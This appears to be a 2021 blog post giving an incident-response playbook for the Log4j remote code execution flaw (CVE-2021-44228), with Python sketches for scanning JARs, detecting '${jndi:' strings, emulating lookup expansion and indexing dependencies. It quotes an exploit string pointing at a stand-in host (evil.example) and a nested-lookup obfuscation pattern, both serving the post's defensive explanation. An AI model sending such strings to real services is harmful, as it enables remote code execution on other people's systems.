If you’re reading this on December 13, 2021 and you haven’t started your Log4j response, stop reading after this section and go do it. Come back later.
CVE-2021-44228 is a remote code execution vulnerability in Apache Log4j 2. It’s trivially exploitable. An attacker sends a crafted string to anything that gets logged, and your server can execute arbitrary code. No authentication needed. No special access. Just a string in a header, a search field, a username – anything that hits a log statement.
This is the worst vulnerability I’ve seen in a decade of doing this work. Worse than Heartbleed. Worse than Shellshock. The attack surface is enormous because Log4j is everywhere and logging happens everywhere.
What to Do Right Now
I’m helping three teams respond to this simultaneously. Here is the playbook I’m running.
Hour 1: Assign ownership and open a war room.
Name an incident lead. Open a single tracking document – not a Slack thread, not three Jira boards. One document with one owner. This is a security incident, not a normal bug. Treat it accordingly.
Hour 2-4: Inventory.
This is the hardest and most important step. You need to know where Log4j exists in your environment. The problem is that it’s a transitive dependency for hundreds of Java libraries and frameworks. You might not use Log4j directly. Spring Boot pulls it in. Apache Solr bundles it. Elasticsearch includes it. Your vendor’s SaaS product might run it.
Where to look:
- Dependency manifests (`pom.xml`, `build.gradle`, `package-lock.json` for JVM wrappers)
- Build artifacts – `find / -name "log4j*.jar"` on your servers, yes, really
- Container images – scan them, don’t assume
- Vendor products and SaaS tools you deploy internally
- CI/CD infrastructure itself (Jenkins is Java-based)
Don’t assume “we don’t use Java.” I’ve watched three separate organizations say this and then discover Log4j in their Elasticsearch cluster, their Jenkins server, and a vendor appliance nobody remembered existed.
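A filename search misses JARs that bundle Log4j under a different name, so check archive contents too. Here’s a minimal sketch of that sweep in Python – it looks inside each JAR for the vulnerable `JndiLookup` class. It’s a heuristic, not an exhaustive scanner: it won’t catch shaded (repackaged) classes or JARs nested inside WARs/EARs.

```python
"""Sketch: flag JARs that bundle the vulnerable JndiLookup class.
Heuristic only -- misses shaded classes and nested archives."""
import os
import zipfile

# The class that implements the dangerous JNDI lookup in log4j-core.
VULN_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def scan(root):
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith((".jar", ".war", ".ear")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as zf:
                    if VULN_CLASS in zf.namelist():
                        hits.append(path)
            except (zipfile.BadZipFile, OSError):
                pass  # unreadable archive: log it separately, don't crash the sweep
    return hits
```

Run it as `scan("/opt")` (or wherever your applications live) and feed the hits straight into your tracking document.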
Hour 4-8: Mitigate the exposed services.
Patch where you can. As of today, Log4j 2.16.0 is the fix (2.15.0 shipped an incomplete fix; go straight to 2.16.0). For services you can’t patch immediately:
- Set the JVM flag `-Dlog4j2.formatMsgNoLookups=true` (works for 2.10+)
- Restrict outbound network access from application servers. If your Java service can’t reach the internet, the JNDI lookup fails. This isn’t a fix. It’s a mitigation.
- Add WAF rules to block `${jndi:` patterns in request headers and parameters. This is defense in depth, not a solution. Attackers are already finding bypass patterns.
- For older versions (below 2.10), remove the `JndiLookup` class from the classpath entirely
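To see why pattern blocking is only a speed bump, consider how easily the plain `${jndi:` string can be obfuscated with nested lookups. This toy Python detector is illustrative only – it is not a WAF rule, and the heuristics shown here are assumptions about common bypass shapes, not a complete list:

```python
"""Toy detector for the kinds of strings a WAF rule might flag.
Illustrative only: real bypasses are more varied than this."""

def looks_suspicious(value: str) -> bool:
    v = value.lower()
    # Plain form of the exploit string.
    if "${jndi:" in v:
        return True
    # Nested lookups (e.g. ${${lower:j}ndi:...}) hide the literal "jndi".
    # Flagging any doubly-nested ${...${...}} is crude and will produce
    # false positives -- which is exactly why this is not a fix.
    first = v.find("${")
    if first != -1 and "${" in v[first + 2:]:
        return True
    return False
```

The nested-lookup check catches known obfuscations like `${${lower:j}ndi:...}` at the cost of false positives; that trade-off is acceptable for a temporary mitigation, not for a permanent control.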
Prioritize internet-facing services first. Then internal services that process external input (email, file uploads, webhooks). Then everything else.
Day 2+: Vendor pressure and verification.
Email every vendor whose Java-based products run in your environment. Ask three questions:
- Does your product include Log4j? Which version?
- Is a patch available now? If not, when?
- What mitigations should we apply while waiting?
Some vendors won’t know yet. Track their status and follow up daily.
Why This Is So Bad
Log4j is a logging library. Logging is one of those things every application does, everywhere, all the time. User input gets logged constantly – request parameters, headers, error messages, form fields. The vulnerability turns every log statement that touches user input into a potential RCE.
The JNDI lookup feature that enables the exploit was a feature, not a bug. It was designed to let log messages pull dynamic content from remote sources. Nobody anticipated that this would become a trivially exploitable code execution path. But here we are.
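The mechanism is easier to see in miniature. The sketch below is NOT Log4j’s implementation – it’s a toy Python emulation of lookup expansion. Log4j lookups like `${env:...}` and `${jndi:...}` are real; the resolver functions here are stand-ins that show how attacker-controlled text in a log message reaches a resolver at all:

```python
"""Toy emulation of message-lookup expansion. Not Log4j's code --
a stand-in to show why lookups in logged user input are dangerous."""
import os
import re

def expand(message, resolvers):
    # Repeatedly substitute innermost ${prefix:key} patterns.
    pattern = re.compile(r"\$\{([a-z]+):([^${}]*)\}")
    while True:
        m = pattern.search(message)
        if m is None:
            return message
        prefix, key = m.group(1), m.group(2)
        replacement = resolvers.get(prefix, lambda k: "")(key)
        message = message[:m.start()] + replacement + message[m.end():]

resolvers = {
    # Legitimate use: pull an environment variable into a log line.
    "env": lambda k: os.environ.get(k, ""),
    # A real JNDI resolver fetches remote content -- and that fetch is
    # what attackers turned into code execution. Here it just marks the spot.
    "jndi": lambda k: f"<remote lookup of {k}!>",
}

print(expand("user agent: ${jndi:ldap://evil.example/a}", resolvers))
```

The point: the logging pipeline treats the *content* of a message as something to evaluate, so any user input that reaches a log statement reaches the resolver too.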
The blast radius isn’t just your code. It’s every dependency that uses Log4j. It’s every vendor product. It’s every internal tool. Exploitation is happening in the wild right now and automated scanning is widespread.
The Inventory Problem Is the Real Problem
The technical fix is straightforward: update Log4j. The hard part is knowing where Log4j lives.
Most organizations can’t answer “what software do we run and what are its dependencies” quickly. This has been a known gap for years and it bites hardest during events exactly like this one.
If you come out of this incident without building a software bill of materials (SBOM) practice, you’ll have the same problem next time. And there will be a next time.
What an SBOM practice looks like:
- Generate dependency manifests as part of your build pipeline
- Store them in a searchable registry
- Include transitive dependencies, not just direct ones
- Cover vendor products and container base images
- Be able to answer “which services use library X at version Y” in minutes, not days
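That last query is just an inverted index over your manifests. A minimal sketch, assuming you already generate per-service dependency lists (the service names, coordinates, and manifest layout below are hypothetical):

```python
"""Minimal sketch of 'which services use library X at version Y'.
Manifest shape and all names are hypothetical examples."""
from collections import defaultdict

def build_index(manifests):
    """manifests: {service: [(library, version), ...]} -> inverted index."""
    index = defaultdict(set)
    for service, deps in manifests.items():
        for lib, version in deps:
            index[(lib, version)].add(service)
    return index

manifests = {
    "search-api": [("org.apache.logging.log4j:log4j-core", "2.14.1")],
    "billing":    [("org.apache.logging.log4j:log4j-core", "2.16.0")],
    "auth":       [("ch.qos.logback:logback-classic", "1.2.7")],
}
index = build_index(manifests)
print(index[("org.apache.logging.log4j:log4j-core", "2.14.1")])  # {'search-api'}
```

In practice you’d build this from SBOM documents (CycloneDX or SPDX) emitted by your build pipeline, but the query pattern is the same: the expensive part is collecting the manifests, not answering the question.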
Communication: Don’t Go Silent
I’ve seen organizations go quiet externally during this response because they’re “still assessing.” That’s the wrong call. Customers and partners are asking. Silence reads as “they don’t know” or, worse, “they don’t care.”
Send updates on a fixed cadence. Every 12 hours minimum. Even if the update is “we’re still inventorying and have mitigated N of M known-affected services.” Structured communication builds trust. Silence destroys it.
Keep an internal status page with every service listed and its status: unknown, investigating, affected, mitigated, patched. Update it as you go. “Unknown” is a valid status – better than pretending you have checked things you haven’t.
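The status page doubles as the source for your update cadence. A sketch of that roll-up in Python (service names are hypothetical; the five statuses are the ones above):

```python
"""Sketch: roll the internal status page up into the 'N of M' update line.
Service names are hypothetical; statuses match the incident doc."""
from collections import Counter

STATUSES = ("unknown", "investigating", "affected", "mitigated", "patched")

services = {
    "search-api": "mitigated",
    "billing": "patched",
    "jenkins": "investigating",
    "vendor-appliance": "unknown",
}

def summary(services):
    counts = Counter(services.values())
    # "Known-affected" = confirmed affected, whether or not it's fixed yet.
    known_affected = counts["affected"] + counts["mitigated"] + counts["patched"]
    fixed = counts["mitigated"] + counts["patched"]
    return (f"mitigated or patched {fixed} of {known_affected} "
            f"known-affected services; {counts['unknown']} still unknown")
```

Note that “unknown” is tracked explicitly rather than hidden – the count going down over successive updates is itself evidence of progress.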
After the Fire
When the acute response is over (and it will take weeks, not days), don’t just move on. Some things that need to happen:
- Remove temporary mitigations and verify patches are applied end-to-end
- Audit your response: how long did it take to produce a credible inventory? What did you miss? Where were the gaps?
- Build the SBOM practice you should have had before this happened
- Review your vendor management process – did you know which vendors to contact?
- Update your incident response playbook with what you learned
This vulnerability is a stress test for your entire security posture. How you respond to it says more about your organization’s operational maturity than any compliance audit ever will.
Patch your systems. Inventory your dependencies. Communicate clearly. And when the dust settles, invest in the visibility that would have made this response faster.